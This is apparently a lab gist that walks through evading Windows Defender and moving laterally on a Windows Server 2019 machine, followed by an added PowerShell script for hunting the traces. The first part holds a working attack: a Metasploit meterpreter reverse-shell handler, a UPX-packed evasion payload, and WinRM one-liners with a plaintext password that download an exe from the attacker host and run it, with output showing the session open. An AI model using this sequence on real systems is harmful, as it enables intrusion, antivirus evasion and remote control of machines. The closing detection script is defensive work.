@dualfade
Created March 26, 2019 05:43
Microsoft Windows Server 2019 Standard ( 10.0.17763 N/A Build 17763 ) - WD / BL Evasion - Priv Esc Lateral Move
MODIFIED VEIL HANDLER --
msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc
/*
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.13
set LPORT 3434
set ExitOnSession false
exploit -j
*/
WinDef / BitLoc EVASION TECHNIQUE --
--> Modified Go source compiled for x64, then packed with upx --brute (payload source below) <--
https://github.com/cdowns71/stuffz/blob/master/codez/go/3fb7Jq79.go
PRIV ESC / LATERAL MOVE -- run as PRIVUSER over WinRM with an explicit PSCredential. Note that curl here resolves to curl.exe (shipped with Server 2019) because it is launched through cmd; typed directly into PowerShell, curl is an alias for Invoke-WebRequest and -sk would be rejected.
PS C:\Users\UnPrivUser\Downloads> $username = 'PRIVUSER';$password = 'eRHptu86XTpjxUzt';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName MACHINE -Command { cmd /k curl -sk http://10.10.14.13/3fb7Jq79.exe -o C:\Users\PrivUser\Downloads\3fb7Jq79.exe }
PS C:\Users\UnPrivUser\Downloads> $username = 'PRIVUSER';$password = 'eRHptu86XTpjxUzt';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName MACHINE -Command { cmd /k C:\Users\PrivUser\Downloads\3fb7Jq79.exe }
SHELL --
5:08:08 cdowns@7242-alpha-reticuli ~ msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc
[*] Processing /var/lib/veil/output/handlers/3fb7Jq79.rc for ERB directives.
resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> use exploit/multi/handler
resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set LHOST 10.10.14.13
LHOST => 10.10.14.13
resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set LPORT 3434
LPORT => 3434
resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set ExitOnSession false
ExitOnSession => false
resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.13:3434
msf5 exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.14.13:3434 -> 10.10.10.130:50048) at 2019-03-26 05:08:21 +0000
msf5 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows MACHINE\PrivUser @ MACHINE 10.10.14.13:3434 -> 10.10.10.130:50048 (10.10.10.130)
msf5 exploit(multi/handler) >
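What this sequence leaves on the target, as an added hunting script that is not part of the gist. It assumes it is run on MACHINE with rights to read the Security log and that PowerShell Script Block Logging is enabled (event 4104 in Microsoft-Windows-PowerShell/Operational); the $Hours window, the $Pattern regex and the five-minute correlation window are choices made for this example.

```powershell
# Added example, not from the gist: pull the target-side artefacts of a
# WinRM download-and-execute like the one above. Run locally on the target
# with rights to read the Security log. $Hours and $Pattern are example choices.
param(
    [int]$Hours = 24,
    # curl with the gist's flags, or an exe dropped under a Downloads folder
    [string]$Pattern = 'curl(\.exe)?\s+-sk|Downloads\\[^\s]+\.exe'
)
$since = (Get-Date).AddHours(-$Hours)

function Get-EventField {
    # Read a named EventData field from the event XML instead of guessing
    # positional indexes into $_.Properties, which differ between event versions.
    param(
        [System.Diagnostics.Eventing.Reader.EventLogRecord]$Event,
        [string]$Name
    )
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Get-Events {
    param([string]$Log, [int]$Id)
    Get-WinEvent -FilterHashtable @{ LogName = $Log; Id = $Id; StartTime = $since } `
        -ErrorAction SilentlyContinue
}

# 1. Security 4624 with LogonType 3 (network): the explicit-credential logon
#    made by Invoke-Command, with the attacker's address in IpAddress.
$logons = Get-Events 'Security' 4624 |
    Where-Object { (Get-EventField $_ 'LogonType') -eq '3' } |
    ForEach-Object {
        [pscustomobject]@{
            Time = $_.TimeCreated
            User = Get-EventField $_ 'TargetUserName'
            From = Get-EventField $_ 'IpAddress'
            Auth = Get-EventField $_ 'AuthenticationPackageName'
        }
    }

# 2. Microsoft-Windows-WinRM/Operational 91: a remote shell being created,
#    i.e. the runspace that wsmprovhost.exe hosts for each Invoke-Command.
$shells = Get-Events 'Microsoft-Windows-WinRM/Operational' 91 |
    Select-Object TimeCreated, Message

# 3. Microsoft-Windows-PowerShell/Operational 4104: the script block that ran
#    in that runspace. Script Block Logging must be on for these to exist.
$blocks = Get-Events 'Microsoft-Windows-PowerShell/Operational' 4104 |
    ForEach-Object {
        $text = Get-EventField $_ 'ScriptBlockText'
        if ($text -match $Pattern) {
            [pscustomobject]@{ Time = $_.TimeCreated; ScriptBlock = $text }
        }
    }

# 4. Correlate: a network logon followed within minutes by a script block that
#    pulls an exe with curl is the shape of the gist's two one-liners. Legit
#    admins use WinRM too, so the logon alone is not the signal; the pairing is.
foreach ($b in $blocks) {
    $hits = $logons | Where-Object { [math]::Abs(($_.Time - $b.Time).TotalMinutes) -le 5 }
    foreach ($l in $hits) {
        "{0:u}  {1}@{2} ({3})  ->  {4}" -f $b.Time, $l.User, $l.From, $l.Auth, $b.ScriptBlock
    }
}

"WinRM shells in window: $(@($shells).Count); suspicious script blocks: $(@($blocks).Count)"
```

Against the gist's sequence this prints the PRIVUSER logon from 10.10.14.13 next to the cmd /k curl block, twice (once per Invoke-Command). The ScriptBlockText field is the reason to turn Script Block Logging on before the next engagement: without it the only trace on the host is the 4624 and the WinRM shell creation, both indistinguishable from routine remote administration.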